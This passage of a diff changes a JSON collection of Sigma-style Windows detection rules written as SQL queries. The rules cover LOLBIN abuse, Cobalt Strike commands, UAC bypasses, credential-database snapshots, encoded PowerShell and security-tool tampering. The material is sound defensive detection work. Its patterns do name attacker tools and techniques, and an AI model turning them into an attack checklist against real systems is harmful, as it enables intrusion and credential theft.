'%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR Image LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR Image LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR Image LIKE '%\\\\curl.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\' OR Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR Image LIKE '%\\\\query.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_regedit_trustedinstaller.yml" + 
"filename": "proc_creation_win_java_susp_child_process.yml" }, { - "title": "LOLBAS Data Exfiltration by DataSvcUtil.exe", - "id": "e290b10b-1023-4452-a4a9-eb31a9013b3a", + "title": "Arbitrary Binary Execution Using GUP Utility", + "id": "d65aee4d-2292-4cea-b832-83accd6cfa43", "status": "experimental", - "description": "Detects when a user performs data exfiltration by using DataSvcUtil.exe", - "author": "Ialle Teixeira @teixeira0xfffff, Austin Songer @austinsonger", + "description": "Detects execution of the Notepad++ updater (gup) to launch other commands or executables", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.exfiltration", - "attack.t1567" + "attack.execution" ], "falsepositives": [ - "DataSvcUtil.exe being used may be performed by a system administrator.", - "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "DataSvcUtil.exe being executed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
+ "Other parent binaries using GUP not currently identified" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%/in:%' ESCAPE '\\' OR CommandLine LIKE '%/out:%' ESCAPE '\\' OR CommandLine LIKE '%/uri:%' ESCAPE '\\') AND (Image LIKE '%\\\\DataSvcUtil.exe' ESCAPE '\\' OR OriginalFileName = 'DataSvcUtil.exe'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\gup.exe' ESCAPE '\\' AND Image LIKE '%\\\\explorer.exe' ESCAPE '\\') AND NOT ((Image LIKE '%\\\\explorer.exe' ESCAPE '\\' AND CommandLine LIKE '%\\\\Notepad++\\\\notepad++.exe%' ESCAPE '\\') OR (ParentImage LIKE '%\\\\Notepad++\\\\updater\\\\%' ESCAPE '\\') OR (CommandLine = '')))" ], - "filename": "proc_creation_win_lolbin_data_exfiltration_by_using_datasvcutil.yml" + "filename": "proc_creation_win_gup_arbitrary_binary_execution.yml" }, { - "title": "Operator Bloopers Cobalt Strike Commands", - "id": "647c7b9e-d784-4fda-b9a0-45c565a7b729", - "status": "experimental", - "description": "Detects use of Cobalt Strike commands accidentally entered in the CMD shell", - "author": "_pete_0, TheDFIRReport", + "title": "Suspicious CodePage Switch Via CHCP", + "id": "c7942406-33dd-4377-a564-0f62db0593a3", + "status": "test", + "description": "Detects a code page switch in command line or batch scripts to a rare language", + "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", "tags": [ - "attack.execution", - "attack.t1059.003" + "attack.t1036", + "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Administrative activity (adjust code pages according to your organization's region)" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'Cmd.Exe' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\') AND 
((CommandLine LIKE 'cmd %' ESCAPE '\\' OR CommandLine LIKE 'cmd.exe%' ESCAPE '\\' OR CommandLine LIKE 'c:\\\\windows\\\\system32\\\\cmd.exe%' ESCAPE '\\') AND (CommandLine LIKE '%psinject%' ESCAPE '\\' OR CommandLine LIKE '%spawnas%' ESCAPE '\\' OR CommandLine LIKE '%make\\_token%' ESCAPE '\\' OR CommandLine LIKE '%remote-exec%' ESCAPE '\\' OR CommandLine LIKE '%rev2self%' ESCAPE '\\' OR CommandLine LIKE '%dcsync%' ESCAPE '\\' OR CommandLine LIKE '%logonpasswords%' ESCAPE '\\' OR CommandLine LIKE '%execute-assembly%' ESCAPE '\\' OR CommandLine LIKE '%getsystem%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\chcp.com' ESCAPE '\\' AND (CommandLine LIKE '% 936' ESCAPE '\\' OR CommandLine LIKE '% 1258' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_cobaltstrike_bloopers_cmd.yml" + "filename": "proc_creation_win_chcp_codepage_switch.yml" }, { - "title": "Raccine Uninstall", - "id": "a31eeaed-3fd5-478e-a8ba-e62c6b3f9ecc", + "title": "MpiExec Lolbin", + "id": "729ce0ea-5d8f-4769-9762-e35de441586d", "status": "test", - "description": "Detects commands that indicate a Raccine removal from an end system. 
Raccine is a free ransomware protection tool.", + "description": "Detects a certain command line flag combination used by mpiexec.exe LOLBIN from HPC pack that can be used to execute any other binary", "author": "Florian Roth (Nextron Systems)", "tags": [ + "attack.execution", "attack.defense_evasion", - "attack.t1562.001" + "attack.t1218" ], "falsepositives": [ - "Legitimate deinstallation by administrative staff" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%taskkill %' ESCAPE '\\' AND CommandLine LIKE '%RaccineSettings.exe%' ESCAPE '\\') OR (CommandLine LIKE '%reg.exe%' ESCAPE '\\' AND CommandLine LIKE '%delete%' ESCAPE '\\' AND CommandLine LIKE '%Raccine Tray%' ESCAPE '\\') OR (CommandLine LIKE '%schtasks%' ESCAPE '\\' AND CommandLine LIKE '%/DELETE%' ESCAPE '\\' AND CommandLine LIKE '%Raccine Rules Updater%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\mpiexec.exe' ESCAPE '\\' OR Imphash = 'd8b52ef6aaa3a81501bdfff9dbb96217' OR Hashes LIKE '%IMPHASH=d8b52ef6aaa3a81501bdfff9dbb96217%' ESCAPE '\\') AND (CommandLine LIKE '% /n 1 %' ESCAPE '\\' OR CommandLine LIKE '% -n 1 %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_disable_raccine.yml" + "filename": "proc_creation_win_lolbin_mpiexec.yml" }, { - "title": "WmiPrvSE Spawned A Process", - "id": "d21374ff-f574-44a7-9998-4a8c8bf33d7d", - "status": "stable", - "description": "Detects wmiprvse spawning processes", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "title": "Active Directory Database Snapshot Via ADExplorer", + "id": "9212f354-7775-4e28-9c9f-8f0a4544e664", + "status": "experimental", + "description": "Detects the execution of Sysinternals ADExplorer with the \"-snapshot\" flag in order to save a local copy of the active directory database.", + "author": "Nasreddine Bencherchali (Nextron 
Systems)", "tags": [ - "attack.execution", - "attack.t1047" + "attack.credential_access", + "attack.t1552.001", + "attack.t1003.003" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\WmiPrvSe.exe' ESCAPE '\\' AND NOT ((LogonId IN ('0x3e7', 'null') OR (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') OR (Image LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' OR Image LIKE '%\\\\WerFault.exe' ESCAPE '\\')) OR (LogonId = '')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\ADExplorer.exe' ESCAPE '\\' OR OriginalFileName = 'AdExp') AND CommandLine LIKE '%snapshot%' ESCAPE '\\')" ], - "filename": "proc_creation_win_wmiprvse_spawning_process.yml" + "filename": "proc_creation_win_sysinternals_adexplorer_execution.yml" }, { - "title": "Potential Suspicious Child Process Of 3CXDesktopApp", - "id": "63f3605b-979f-48c2-b7cc-7f90523fed88", + "title": "Suspicious Execution of Powershell with Base64", + "id": "fb843269-508c-4b76-8b8d-88679db22ce7", "status": "experimental", - "description": "Detects potential suspicious child processes of \"3CXDesktopApp.exe\". 
Which could be related to the 3CXDesktopApp supply chain compromise", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Commandline to launch powershell with a base64 payload", + "author": "frack113", "tags": [ - "attack.command_and_control", "attack.execution", - "attack.t1218" + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\3CXDesktopApp.exe' ESCAPE '\\' AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '% -e %' ESCAPE '\\' OR CommandLine LIKE '% -en %' ESCAPE '\\' OR CommandLine LIKE '% -enc %' ESCAPE '\\' OR CommandLine LIKE '% -enco%' ESCAPE '\\' OR CommandLine LIKE '% -ec %' ESCAPE '\\')) AND NOT ((CommandLine LIKE '% -Encoding %' ESCAPE '\\') OR ((ParentImage LIKE '%C:\\\\Packages\\\\Plugins\\\\Microsoft.GuestConfiguration.ConfigurationforWindows\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\gc\\_worker.exe%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_malware_3cx_compromise_susp_children.yml" + "filename": "proc_creation_win_powershell_encode.yml" }, { - "title": "Modify Group Policy Settings", - "id": "ada4b0c4-758b-46ac-9033-9004613a150d", + "title": "Sysinternals PsSuspend Execution", + "id": "48bbc537-b652-4b4e-bd1d-281172df448f", "status": "experimental", - "description": "Detect malicious GPO modifications can be used to 
implement many other malicious behaviors.", - "author": "frack113", + "description": "Detects usage of Sysinternals PsSuspend which can be abused to suspend critical processes", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1484.001" + "attack.discovery", + "attack.persistence", + "attack.t1543.003" ], "falsepositives": [ - "Legitimate use" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND CommandLine LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System%' ESCAPE '\\' AND (CommandLine LIKE '%GroupPolicyRefreshTimeDC%' ESCAPE '\\' OR CommandLine LIKE '%GroupPolicyRefreshTimeOffsetDC%' ESCAPE '\\' OR CommandLine LIKE '%GroupPolicyRefreshTime%' ESCAPE '\\' OR CommandLine LIKE '%GroupPolicyRefreshTimeOffset%' ESCAPE '\\' OR CommandLine LIKE '%EnableSmartScreen%' ESCAPE '\\' OR CommandLine LIKE '%ShellSmartScreenLevel%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'pssuspend.exe' OR (Image LIKE '%\\\\pssuspend.exe' ESCAPE '\\' OR Image LIKE '%\\\\pssuspend64.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_reg_modify_group_policy_settings.yml" + "filename": "proc_creation_win_sysinternals_pssuspend_execution.yml" }, { - "title": "Run PowerShell Script from Redirected Input Stream", - "id": "c83bf4b5-cdf0-437c-90fa-43d734f7c476", - "status": "test", - "description": "Detects PowerShell script execution via input stream redirect", - "author": "Moriarty Meng (idea), Anton Kutepov (rule), oscd.community", + "title": "Potential Tampering With RDP Related Registry Keys Via Reg.EXE", + "id": "0d5675be-bc88-4172-86d3-1e96a4476536", + "status": "experimental", + "description": "Detects the execution of 
\"reg.exe\" for enabling/disabling the RDP service on the host by tampering with the 'CurrentControlSet\\Control\\Terminal Server' values", + "author": "pH-T (Nextron Systems), @Kostastsale, @TheDFIRReport", "tags": [ "attack.defense_evasion", - "attack.execution", - "attack.t1059" + "attack.lateral_movement", + "attack.t1021.001", + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine REGEXP '\\s-\\s*<')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '%\\\\CurrentControlSet\\\\Control\\\\Terminal Server%' ESCAPE '\\' AND CommandLine LIKE '%REG\\_DWORD%' ESCAPE '\\' AND CommandLine LIKE '% /f%' ESCAPE '\\')) AND ((CommandLine LIKE '%Licensing Core%' ESCAPE '\\' AND CommandLine LIKE '%EnableConcurrentSessions%' ESCAPE '\\') OR (CommandLine LIKE '%WinStations\\\\RDP-Tcp%' ESCAPE '\\' OR CommandLine LIKE '%MaxInstanceCount%' ESCAPE '\\' OR CommandLine LIKE '%fEnableWinStation%' ESCAPE '\\' OR CommandLine LIKE '%TSUserEnabled%' ESCAPE '\\' OR CommandLine LIKE '%TSEnabled%' ESCAPE '\\' OR CommandLine LIKE '%TSAppCompat%' ESCAPE '\\' OR CommandLine LIKE '%IdleWinStationPoolCount%' ESCAPE '\\' OR CommandLine LIKE '%TSAdvertise%' ESCAPE '\\' OR CommandLine LIKE '%AllowTSConnections%' ESCAPE '\\' OR CommandLine LIKE '%fSingleSessionPerUser%' ESCAPE '\\' OR CommandLine LIKE '%fDenyTSConnections%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_run_script_from_input_stream.yml" + "filename": "proc_creation_win_reg_rdp_keys_tamper.yml" }, { - "title": "AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl", - "id": 
"074e0ded-6ced-4ebd-8b4d-53f55908119d", + "title": "Regsvr32 Flags Anomaly", + "id": "b236190c-1c61-41e9-84b3-3fe03f6d76b0", "status": "test", - "description": "Detects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and copied cscript.exe (can be renamed)", - "author": "Julia Fomina, oscd.community", + "description": "Detects a flag anomaly in which regsvr32.exe uses a /i flag without using a /n flag at the same time", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1216" + "attack.t1218.010" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%winrm%' ESCAPE '\\' AND (CommandLine LIKE '%format:pretty%' ESCAPE '\\' OR CommandLine LIKE '%format:\"pretty\"%' ESCAPE '\\' OR CommandLine LIKE '%format:\"text\"%' ESCAPE '\\' OR CommandLine LIKE '%format:text%' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '% /i:%' ESCAPE '\\') AND NOT (CommandLine LIKE '% /n %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_winrm_awl_bypass.yml" + "filename": "proc_creation_win_regsvr32_flags_anomaly.yml" }, { - "title": "Execute From Alternate Data Streams", - "id": "7f43c430-5001-4f8b-aaa9-c3b88f18fa5c", - "status": "test", - "description": "Detects execution from an Alternate Data Stream (ADS). 
Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection", + "title": "Change PowerShell Policies to an Insecure Level", + "id": "87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180", + "status": "experimental", + "description": "Detects use of executionpolicy option to set insecure policies", "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1564.004" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Administrator script" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND CommandLine LIKE '%txt:%' ESCAPE '\\' AND ((CommandLine LIKE '%type %' ESCAPE '\\' AND CommandLine LIKE '% > %' ESCAPE '\\') OR (CommandLine LIKE '%makecab %' ESCAPE '\\' AND CommandLine LIKE '%.cab%' ESCAPE '\\') OR (CommandLine LIKE '%reg %' ESCAPE '\\' AND CommandLine LIKE '% export %' ESCAPE '\\') OR (CommandLine LIKE '%regedit %' ESCAPE '\\' AND CommandLine LIKE '% /E %' ESCAPE '\\') OR (CommandLine LIKE '%esentutl %' ESCAPE '\\' AND CommandLine LIKE '% /y %' ESCAPE '\\' AND CommandLine LIKE '% /d %' ESCAPE '\\' AND CommandLine LIKE '% /o %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '% -executionpolicy %' ESCAPE '\\' OR CommandLine LIKE '% -ep %' ESCAPE '\\' OR CommandLine LIKE '% -exec %' ESCAPE '\\') AND (CommandLine LIKE '%Unrestricted%' ESCAPE '\\' OR CommandLine LIKE '%bypass%' ESCAPE '\\' OR CommandLine LIKE '%RemoteSigned%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%C:\\\\Program Files%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\Code\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_alternate_data_streams.yml" + "filename": "proc_creation_win_powershell_set_policies_to_unsecure_level.yml" }, { - "title": "Suspicious Csi.exe Usage", - "id": 
"40b95d31-1afc-469e-8d34-9a3a667d058e", - "status": "experimental", - "description": "Csi.exe is a signed binary from Microsoft that comes with Visual Studio and provides C# interactive capabilities. It can be used to run C# code from a file passed as a parameter in command line. Early version of this utility provided with Microsoft “Roslyn” Community Technology Preview was named 'rcsi.exe'", - "author": "Konstantin Grishchenko, oscd.community", + "title": "DLL Execution Via Register-cimprovider.exe", + "id": "a2910908-e86f-4687-aeba-76a5f996e652", + "status": "test", + "description": "Detects using register-cimprovider.exe to execute arbitrary dll file.", + "author": "Ivan Dyachkov, Yulia Fomina, oscd.community", "tags": [ - "attack.execution", - "attack.t1072", "attack.defense_evasion", - "attack.t1218" + "attack.t1574" ], "falsepositives": [ - "Legitimate usage by software developers" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\csi.exe' ESCAPE '\\' OR Image LIKE '%\\\\rcsi.exe' ESCAPE '\\') OR OriginalFileName IN ('csi.exe', 'rcsi.exe')) AND Company = 'Microsoft Corporation')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\register-cimprovider.exe' ESCAPE '\\' AND CommandLine LIKE '%-path%' ESCAPE '\\' AND CommandLine LIKE '%dll%' ESCAPE '\\')" ], - "filename": "proc_creation_win_csi_execution.yml" + "filename": "proc_creation_win_registry_cimprovider_dll_load.yml" }, { - "title": "Potential RDP Session Hijacking Activity", - "id": "224f140f-3553-4cd1-af78-13d81bf9f7cc", + "title": "Obfuscated IP Download", + "id": "cb5a2333-56cf-4562-8fcb-22ba1bca728d", "status": "experimental", - "description": "Detects potential RDP Session Hijacking activity on Windows systems", - "author": "@juju4", + "description": "Detects use of an encoded/obfuscated version of an IP address (hex, 
octal...) in an URL combined with a download command", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution" + "attack.discovery" ], "falsepositives": [ - "Administrative activity" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\tscon.exe' ESCAPE '\\' OR OriginalFileName = 'tscon.exe') AND IntegrityLevel = 'SYSTEM')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\' OR CommandLine LIKE '%wget %' ESCAPE '\\' OR CommandLine LIKE '%curl %' ESCAPE '\\' OR CommandLine LIKE '%DownloadFile%' ESCAPE '\\' OR CommandLine LIKE '%DownloadString%' ESCAPE '\\') AND ((CommandLine LIKE '%//0x%' ESCAPE '\\' OR CommandLine LIKE '%.0x%' ESCAPE '\\' OR CommandLine LIKE '%.00x%' ESCAPE '\\') OR (CommandLine LIKE '%http://\\%%' ESCAPE '\\' AND CommandLine LIKE '%\\%2e%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_tscon_rdp_session_hijacking.yml" + "filename": "proc_creation_win_susp_obfuscated_ip_download.yml" }, { - "title": "UAC Bypass Using Disk Cleanup", - "id": "b697e69c-746f-4a86-9f59-7bfff8eab881", - "status": "test", - "description": "Detects the pattern of UAC Bypass using scheduled tasks and variable expansion of cleanmgr.exe (UACMe 34)", - "author": "Christian Burkard (Nextron Systems)", + "title": "Regsvr32 Spawning Explorer", + "id": "6f0947a4-1c5e-4e0d-8ac7-53159b8f23ca", + "status": "experimental", + "description": "Detects \"regsvr32.exe\" spawning \"explorer.exe\", which is very uncommon.", + "author": "elhoim", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1218.010" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND 
CommandLine LIKE '%\"\\\\system32\\\\cleanmgr.exe /autoclean /d C:' ESCAPE '\\' AND ParentCommandLine LIKE 'C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p -s Schedule' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND Image LIKE '%\\\\explorer.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_uac_bypass_cleanmgr.yml" + "filename": "proc_creation_win_regsvr32_spawn_explorer.yml" }, { - "title": "Suspicious Usage Of Active Directory Diagnostic Tool (ntdsutil.exe)", - "id": "a58353df-af43-4753-bad0-cd83ef35eef5", + "title": "Use of Adplus.exe", + "id": "2f869d59-7f6a-4931-992c-cce556ff2d53", "status": "experimental", - "description": "Detects execution of ntdsutil.exe to perform different actions such as restoring snapshots...etc.", + "description": "The \"AdPlus.exe\" binary that is part of the Windows SDK can be used as a lolbin to dump process memory and execute arbitrary commands", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.003" + "attack.defense_evasion", + "attack.execution", + "attack.t1003.001" ], "falsepositives": [ - "Legitimate usage to restore snapshots", - "Legitimate admin activity" + "Legitimate usage of Adplus" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\ntdsutil.exe' ESCAPE '\\' OR OriginalFileName = 'ntdsutil.exe') AND ((CommandLine LIKE '%snapshot%' ESCAPE '\\' AND CommandLine LIKE '%mount %' ESCAPE '\\') OR (CommandLine LIKE '%ac%' ESCAPE '\\' AND CommandLine LIKE '% i%' ESCAPE '\\' AND CommandLine LIKE '% ntds%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\adplus.exe' ESCAPE '\\' OR OriginalFileName = 'Adplus.exe') 
AND (CommandLine LIKE '% -hang %' ESCAPE '\\' OR CommandLine LIKE '% -pn %' ESCAPE '\\' OR CommandLine LIKE '% -pmn %' ESCAPE '\\' OR CommandLine LIKE '% -p %' ESCAPE '\\' OR CommandLine LIKE '% -po %' ESCAPE '\\' OR CommandLine LIKE '% -c %' ESCAPE '\\' OR CommandLine LIKE '% -sc %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_ntdsutil_susp_usage.yml" + "filename": "proc_creation_win_lolbin_adplus.yml" }, { - "title": "Potential Defense Evasion Via Right-to-Left Override", - "id": "ad691d92-15f2-4181-9aa4-723c74f9ddc3", - "status": "experimental", - "description": "Detects the presence of the \"u202+E\" character, which causes a terminal, browser, or operating system to render text in a right-to-left sequence.\nThis is used as an obfuscation and masquerading techniques.\n", - "author": "Micah Babinski, @micahbabinski", + "title": "Suspicious VBoxDrvInst.exe Parameters", + "id": "b7b19cb6-9b32-4fc4-a108-73f19acfe262", + "status": "test", + "description": "Detect VBoxDrvInst.exe run with parameters allowing processing INF file.\nThis allows to create values in the registry and install drivers.\nFor example one could use this technique to obtain persistence via modifying one of Run or RunOnce registry keys\n", + "author": "Konstantin Grishchenko, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1036.002" + "attack.t1112" ], "falsepositives": [ - "Commandlines that contains scriptures such as arabic or hebrew might make use of this character" + "Legitimate use of VBoxDrvInst.exe utility by VirtualBox Guest Additions installation process" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%‮%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\VBoxDrvInst.exe' ESCAPE '\\' AND CommandLine LIKE '%driver%' ESCAPE '\\' AND CommandLine LIKE '%executeinf%' 
ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_right_to_left_override.yml" + "filename": "proc_creation_win_virtualbox_vboxdrvinst_execution.yml" }, { - "title": "UAC Bypass Using IEInstal - Process", - "id": "80fc36aa-945e-4181-89f2-2f907ab6775d", + "title": "Potential Tampering With Security Products Via WMIC", + "id": "847d5ff3-8a31-4737-a970-aeae8fe21765", "status": "test", - "description": "Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects uninstallation or termination of security products using the WMIC utility", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Legitimate administration" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND IntegrityLevel IN ('High', 'System') AND ParentImage LIKE '%\\\\ieinstal.exe' ESCAPE '\\' AND Image LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND Image LIKE '%consent.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%wmic%' ESCAPE '\\' AND CommandLine LIKE '%product where %' ESCAPE '\\' AND CommandLine LIKE '%call%' ESCAPE '\\' AND CommandLine LIKE '%uninstall%' ESCAPE '\\' AND CommandLine LIKE '%/nointeractive%' ESCAPE '\\') OR (CommandLine LIKE '%wmic%' ESCAPE '\\' AND CommandLine LIKE '%caption like %' ESCAPE '\\' AND (CommandLine LIKE '%call delete%' ESCAPE '\\' OR CommandLine LIKE '%call terminate%' ESCAPE '\\')) OR (CommandLine LIKE '%process %' ESCAPE '\\' AND CommandLine LIKE '%where %' ESCAPE '\\' AND CommandLine LIKE '%delete%' ESCAPE '\\')) AND (CommandLine LIKE '%\\%carbon\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%cylance\\%%' ESCAPE '\\' OR 
